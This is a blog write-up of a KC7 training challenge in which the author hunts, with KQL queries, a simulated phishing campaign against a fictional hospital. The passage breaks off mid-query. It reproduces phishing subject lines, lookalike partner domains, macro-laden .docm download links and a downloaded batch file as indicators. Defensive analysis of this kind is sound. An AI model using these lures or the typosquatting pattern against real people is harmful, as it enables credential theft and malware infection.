shoutvoid

Aspiring cybersecurity professional

Azure Crest

KC7's first "moderate" difficulty challenge. The player assumes the role of security analyst tasked with detecting any intrusions against Azure Crest Hospital, a mayor healthcare provider with over 200 employees; recently, there's been cost-cutting measures and attempts at streamlining operations, including using a custom-made (!) Enterprise Resource Planning (ERP) system developed by the hospital's Database Administrator (!!), which centralizes all records and information in a single server (!!!).

The case comes with a training guide with additional backstory and context, along with basic KQL tips. Its most useful piece of information is a list of official partners: MedEquipPros (medequippros.org), Pharma Best (pharmabest.net), Health Records Systems (healthrecordsystems.tech), and Emergency Care Partners (emergencycarepartners.com)

Sections

Section 1 - KQL 101

I'll start by scoping out Azure Crest's size and employee distribution.

Employees
| count
Query Results
Count
250 
Employees
| summarize count() by role
Query Results
role count_
Support Staff 66
Administrative Staff 61
Medical Staff 50
Resident Doctors 40
Interns 20
IT Staff 5
Head of Emergency Medicine 1
Chief Financial Officer 1
Chief Administrative Officer 1
IT Director 1
Chief Medical Officer 1
Database Administrator 1
Director of Nursing 1
Head of Surgery 1

There are 250 employees, with most being administrative or support staff, closely followed by medical staff and residential doctors. The hospital's IT department is very small, with only 5 persons as IT staff, a single IT director and a single database administrator.

Section 2 - Quarantine Quandary

There was an alert that a file got quarantined a few days ago; the filename contains the string "healthcare". I was told false positives are rather common, but better be safe than sorry.

SecurityAlerts
| where description contains "healthcare"
Query Results
timestamp alert_type severity description indicators
2024-03-14 10:39:26.0000 HOST high A suspicious file was quarantined on host ZQHM-LAPTOP: New_Healthcare_Protocols.docm [{'hostname': 'ZQHM-LAPTOP', 'filename': 'New_Healthcare_Protocols.docm', 'sha256': '9195246412dc64c15e429887cac945bbde13c249d25dad01c7245219d1ac021a'}]
2024-03-25 16:41:08.0000 EMAIL med Employee milowe reported a suspicious email with the subject "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨" [{'username': 'milowe', 'subject': '[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨'}]

There are two alerts: one for the quarantined file, and another for an email reported as suspicious by user milowe (Resident Doctor Michel Lowe). The suspicious quarantined file is named New_Healthcare_Protocols.docm and has the hash 9195246412dc64c15e429887cac945bbde13c249d25dad01c7245219d1ac021a (which doesn't have any hits on VirusTotal). I decide to investigate the email first, since between the file being quarantined automatically by security software and the email being reported suspicious they could be connected, such as being part of a phishing campaign.

Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
Query Results
timestamp sender reply_to recipient subject verdict link
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com michael_frith@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org susan_deloatch@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org archie_mireles@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org claire_nastasi@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michael_bauer@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org constance_eldredge@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michel_lowe@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org bradley_park@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm

Immediately, there are a bunch of what are very clearly phishing emails; the links all lead to a download for macro-enabled Microsoft Word documents (.docm); the quarantined file New_Healthcare_Protocols.docm and Pediatric_Care_Update.docm; the senders are all suspicious domains, likely an attempt at typosquatting or impersonation of trusted third-parties. In order to get a better scope of the problem, I use:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
//| distinct tostring(parse_url(link).Host)
Query Results
timestamp sender reply_to recipient subject verdict link
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com joseph_markland@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com geneva_arthur@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com elizabeth_harris@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 11:50:43.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com melvin_hudgens@azurecresthospital.med [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com roy_trenneman@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com monte_baez@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com edward_williamson@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com claire_arce@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 10:52:18.0000 healthupdate@gmail.com healthupdate@gmail.com harry_barnes@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-05 16:07:35.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org charlene_simpson@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-05 16:07:35.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org scott_horwath@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com michael_frith@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 11:49:48.0000 healthupdate@gmail.com healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-07 15:17:33.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org eunice_birks@azurecresthospital.med [EXTERNAL] RE: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN https://unhealthyrecordsystems.tech/search/published/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com jonathan_bueno@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com maudie_frierson@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com lillian_mcfarland@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:06:07.0000 healthupdate@gmail.com healthupdate@gmail.com michael_huberty@azurecresthospital.med [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍 CLEAN http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-13 10:48:18.0000 healthupdate@gmail.com healthupdate@gmail.com gary_berger@azurecresthospital.med [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟 SUSPICIOUS http://takeyatimecarepartners.com/online/online/online/New_Healthcare_Protocols.docm
2024-03-14 10:27:39.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com scott_thibault@azurecresthospital.med [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-14 10:27:39.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com jerry_jones@azurecresthospital.med [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈 CLEAN http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-15 11:32:43.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org charles_roberge@azurecresthospital.med [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ SUSPICIOUS https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-15 11:32:43.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org anita_hummel@azurecresthospital.med [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ SUSPICIOUS https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-18 10:25:33.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com beatrice_hogg@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-18 10:25:33.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com john_walker@azurecresthospital.med [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀 CLEAN https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org dean_aitken@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org dolores_rader@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org thomas_mccloskey@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 11:52:12.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org judy_tomlinson@azurecresthospital.med [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟 CLEAN http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-21 11:38:00.0000 healthupdate@gmail.com medstaffinfo@hospitalcomm.org sheldon_pella@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://pharmasecondbest.net/search/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org susan_deloatch@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org archie_mireles@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 11:57:55.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org claire_nastasi@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michael_bauer@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org constance_eldredge@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org michel_lowe@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 15:47:08.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org bradley_park@azurecresthospital.med [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨ CLEAN http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-26 16:17:59.0000 medstaffinfo@hospitalcomm.org healthupdate@gmail.com brett_ho@azurecresthospital.med [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟 BLOCKED https://medequipamateurs.org/modules/files/Pediatric_Care_Update.docm
2024-03-27 15:12:25.0000 medstaffinfo@hospitalcomm.org medstaffinfo@hospitalcomm.org justin_flores@azurecresthospital.med [EXTERNAL] psst... Important Pediatric Care Procedure Changes 👀 SUSPICIOUS https://medequipamateurs.org/files/share/public/Pediatric_Care_Update.docm
2024-03-28 15:19:16.0000 healthupdate@gmail.com healthupdate@gmail.com carla_bledsoe@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-03-28 15:19:16.0000 healthupdate@gmail.com healthupdate@gmail.com christina_tate@azurecresthospital.med [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱 CLEAN https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm

There are 41 emails containing these malicious domains; this and other queries so far reveal that the threat actors are using only two email addresses for this campaign: medstaffinfo@hospitalcomm.org and healthupdate@gmail.com. The domains in the links seem to be deliberately alluding to official Azure Crest partners, such as medequipamateurs.org being a reference to medequippros.org. As a whole:

  • The malicious domains are:
    • unhealthyrecordsystems.tech
    • medequipamateurs.org
    • takeyatimecarepartners.com
    • pharmasecondbest.net
  • The malicious email addresses are:
    • medstaffinfo@hospitalcomm.org
    • healthupdate@gmail.com
  • The subject lines are:
    • [EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀
    • [EXTERNAL] FW: [Alert!] Critical Pediatric Care Protocol Revamp 🌟
    • [EXTERNAL] FW: 🔑 Exclusive Access: Innovative Pediatric Care Techniques Unveiled 🔍
    • [EXTERNAL] FW: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] [Urgent!] Mandatory Health Protocol Update 😱
    • [EXTERNAL] RE: 👶 New! Revolutionary Pediatric Healthcare Strategies ✨
    • [EXTERNAL] [Alert!] Critical Pediatric Care Protocol Revamp 🌟
    • [EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈
    • [EXTERNAL] RE: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈
    • [EXTERNAL] psst... Important Pediatric Care Procedure Changes 👀
  • The files in the download links are:
    • Pediatric_Care_Update.docm
    • New_Healthcare_Protocols.docm

I'll check these domains against PassiveDns to see if I can uncover any new domains and IP addresses.

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct tostring(parse_url(link).Host)
| lookup PassiveDns on $left.Host == $right.domain
| distinct ip
Query Results
ip
135.103.59.74
131.92.62.82
62.121.133.43
93.142.203.80
215.95.144.58
25.126.98.121
16.101.245.182
96.120.124.180
131.190.102.173
115.12.60.150

Further nested lookups to find domains or more IP addresses don't return anything else. As a reminder, the malicious domains that point to these IP addresses are: unhealthyrecordsystems.tech, medequipamateurs.org, takeyatimecarepartners.com, pharmasecondbest.net.

During the investigation, The Valdorian Times posted a breaking news report on doctors being unable to access the hospital's internal systems and voicing their displeasure to the press.

Section 3 - The Phisher's Net

Things got more complicated with the Valdorian Times' reports. I keep on investigating, pivoting towards checking just how many of the targeted employees clicked on the links.

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
Query Results
timestamp method src_ip user_agent url
2024-03-01 11:57:43.0000 GET 10.10.0.69 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/4.0) http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:05:43.0000 GET 10.10.0.96 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:09:43.0000 GET 10.10.0.110 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-01 12:31:43.0000 GET 10.10.0.175 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 http://unhealthyrecordsystems.tech/search/public/share/New_Healthcare_Protocols.docm
2024-03-04 11:02:18.0000 GET 10.10.0.16 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:14:18.0000 GET 10.10.0.106 Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:28:18.0000 GET 10.10.0.2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:33:18.0000 GET 10.10.0.35 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.114 Safari/537.36 http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-04 11:33:18.0000 GET 10.10.0.202 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm
2024-03-05 16:51:35.0000 GET 10.10.0.34 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-05 17:04:35.0000 GET 10.10.0.167 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 https://unhealthyrecordsystems.tech/search/share/New_Healthcare_Protocols.docm
2024-03-06 12:12:48.0000 GET 10.10.0.174 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0 https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-06 12:40:48.0000 GET 10.10.0.19 Mozilla/5.0 (Windows NT 5.1; WOW64; Trident/7.0; rv:11.0) like Gecko https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm
2024-03-07 15:32:33.0000 GET 10.10.0.66 Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 https://unhealthyrecordsystems.tech/search/published/New_Healthcare_Protocols.docm
2024-03-12 14:09:07.0000 GET 10.10.0.112 Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:10:07.0000 GET 10.10.0.71 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-12 14:38:07.0000 GET 10.10.0.154 Mozilla/5.0 (Windows NT 5.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 http://takeyatimecarepartners.com/files/public/New_Healthcare_Protocols.docm
2024-03-13 11:32:18.0000 GET 10.10.0.229 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Win64; x64; Trident/5.0) http://takeyatimecarepartners.com/online/online/online/New_Healthcare_Protocols.docm
2024-03-14 10:37:39.0000 GET 10.10.0.174 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0 http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-14 10:37:39.0000 GET 10.10.0.183 Mozilla/5.0 (Windows NT 5.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm
2024-03-15 12:20:43.0000 GET 10.10.0.166 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Safari/537.36 https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-15 12:29:43.0000 GET 10.10.0.105 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 https://takeyatimecarepartners.com/search/search/modules/Pediatric_Care_Update.docm
2024-03-18 10:32:33.0000 GET 10.10.0.187 Mozilla/5.0 (Windows NT 5.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-18 10:48:33.0000 GET 10.10.0.103 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/6.0) https://unhealthyrecordsystems.tech/share/search/Pediatric_Care_Update.docm
2024-03-20 12:07:12.0000 GET 10.10.0.86 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:10:12.0000 GET 10.10.0.170 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:17:12.0000 GET 10.10.0.46 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.120 Safari/537.36 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-20 12:45:12.0000 GET 10.10.0.54 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 http://medequipamateurs.org/share/Pediatric_Care_Update.docm
2024-03-21 11:51:00.0000 GET 10.10.0.133 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; WOW64; Trident/5.0) https://pharmasecondbest.net/search/Pediatric_Care_Update.docm
2024-03-22 12:18:55.0000 GET 10.10.0.78 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0 https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 12:22:55.0000 GET 10.10.0.117 Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-22 12:29:55.0000 GET 10.10.0.224 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/4.0) https://unhealthyrecordsystems.tech/published/published/images/modules/Pediatric_Care_Update.docm
2024-03-25 16:03:08.0000 GET 10.10.0.61 Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 16:26:08.0000 GET 10.10.0.221 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-25 16:37:08.0000 GET 10.10.0.31 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Safari/537.36 http://medequipamateurs.org/online/share/images/New_Healthcare_Protocols.docm
2024-03-27 15:13:25.0000 GET 10.10.0.63 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0) https://medequipamateurs.org/files/share/public/Pediatric_Care_Update.docm
2024-03-28 15:43:16.0000 GET 10.10.0.157 Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-03-28 16:13:16.0000 GET 10.10.0.108 Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Safari/537.36 https://unhealthyrecordsystems.tech/search/New_Healthcare_Protocols.docm
2024-04-02 11:29:37.0000 GET 10.10.0.2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 https://medequipamateurs.org/UrTottalyPwned.bat

There are 39 instances; using the distinct keyword shows that 37 distinct employees clicked the links and downloaded the malicious files. Notoriously, there is a new downloaded file: UrTottalyPwned.bat, downloaded off medequipamateurs.org by IP address 10.10.0.2; that same IP address downloaded New_Healthcare_Protocols.docm 29 days before. The affected employees are:

let bad_emails =
Email
